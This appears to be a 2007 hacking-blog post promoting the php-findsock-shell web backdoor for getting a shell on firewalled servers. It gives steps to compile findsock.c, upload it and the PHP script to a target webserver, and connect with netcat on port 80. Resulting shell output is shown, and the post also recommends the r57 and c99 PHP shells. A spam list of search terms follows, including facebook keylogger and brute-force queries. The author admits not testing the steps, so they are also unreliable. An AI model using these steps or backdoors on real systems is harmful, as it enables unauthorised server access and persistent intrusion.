Creating a reverse shell on a non-firewalled server , won’t be a problem when you use php shells such as r57 or c99. R57 and c99 will simply create a reverse shell / bind shell by just clicking on their options and while your box is already listening to a specific port. There you’d receive a reverse shell on your own box ,and you’re ready to go! . But what if our target’s firewalled , and the reverse shell method completely being impossible to do? How to create a reverse shell on a Firewalled target server ?
Well, i’ve found this tool, called php-findsock-shell on pentestmonkey’s web. This is the only one tool you’ll need when you wanna create a reverse shell on a firewalled server! Here are some steps that i (actually) haven’t tried it out by myself
, but it should work man
:
- Download the php-findsock-shell here.
- Compile findsock.c : gcc -o findsock findsock.c
- Upload the compiled findsock , and the script php-findsock-shell.php somewhere in the webserver.
- Accessing php-findsock-shell.php through netcat , and enjoy your reverse shell! :
$ nc -v target 80
target [10.0.0.1] 80 (http) open
GET /php-findsock-shell.php HTTP/1.0
sh-3.2$ id
uid=80(apache) gid=80(apache) groups=80(apache)
sh-3.2$
… you now have an interactive shell!
Enjoy ! , further details can be found here.
Recenly searchIncoming search terms for the article:
simple web backdoor, backdoor apache nc 80 php gcc, simple php reverse shell, SHOCKING Hidden Message!!!!! In The Google Logo! You wont believe this!, SHOCKING Hidden Message In The Google Logo! You wont believe this!, shell r57 com php, php-findsock-shell php, php findsock, facebook exploit shell php, backdoor shell c99, tutorial backdoor web pdf,Popular Today naruto shippuden 170 videolog, cat physics walkthrough, naruto shippuden 168 videolog, facebook spy, backtrack 3, shy engine, vtunnel, BackTrack tutorial, backtrack 3 tutorial, facebook photo viewer, See The Shocking Hidden Message In The Google Logo that GOOGLE Does NOT Want You To Know About!, how to view private myspace pictures, my empire hack, view private myspace pictures, SHOCKING: RUDE HIDDEN MESSAGE in Toy Story 3!, facebook keylogger, HIDDEN MESSAGE IN GOOGLE LOGO, Terri Moulton Horman, rapidleech, brute force facebook, Computer Security Stuff on eBay!
Electronics stuffs on ebay
php-findsock-shell : another interesting web backdoor is posted on October 2nd, 2007 by admin. This post is filed under: Sectools, Security, backdoor apache nc 80 php gcc, backdoor shell c99, c99 backdoor, Hacking, how to, php findsock, php shells, Security, shell r57.com php, simple web backdoor, tutorials, web backdoors, Web Hacking .
[...] [via] Related PostsPHP to PDF with Oracle DatabasePHP Designer 2007 – Professional 5.3.1PHP connection to OracleFound anotherthing interesting.. “The Dark Game?Found anotherthing interesting.. “The Dark Game†[...]